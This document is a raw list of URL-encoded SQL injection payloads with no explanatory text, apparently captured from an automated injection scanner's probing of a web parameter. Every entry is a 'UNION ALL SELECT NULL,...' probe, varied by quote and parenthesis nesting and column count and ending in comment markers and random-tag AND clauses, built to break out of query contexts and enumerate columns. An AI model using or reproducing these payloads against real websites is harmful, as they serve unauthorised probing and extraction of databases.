1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27kwMh%27%3D%27kwMh 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27FJXE%27%3D%27FJXE 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Ospo%27%3D%27Ospo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27UqPR%27%3D%27UqPR 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Vcjq%27%3D%27Vcjq 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27AJKu%27%3D%27AJKu 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27jdII%27%3D%27jdII 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27xGls%27%3D%27xGls 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27CZgS%27%3D%27CZgS 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Zuhw%27%3D%27Zuhw 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27OQnK%27%3D%27OQnK 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27VdNY%27%3D%27VdNY 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27fpga%27%3D%27fpga 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ixfR%27%3D%27ixfR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27WRen%27%3D%27WRen 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27xwpn%27%3D%27xwpn 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27LtrI%27%3D%27LtrI 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27Xtmu%27%3D%27Xtmu 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ZNKk%27%3D%27ZNKk 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27Nmxd%27%3D%27Nmxd 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27HKFB%27%3D%27HKFB 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27LyoE%27%3D%27LyoE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27kjFC%27%3D%27kjFC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27dSXE%27%3D%27dSXE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27upnv%27%3D%27upnv 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27vtnm%27%3D%27vtnm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27SyAW%27%3D%27SyAW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27kCbH%27%3D%27kCbH 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27LOQT%27%3D%27LOQT 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27RVGW%27%3D%27RVGW 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27tWUd%27%3D%27tWUd 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27XvNn%27%3D%27XvNn 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Fosi%27%3D%27Fosi 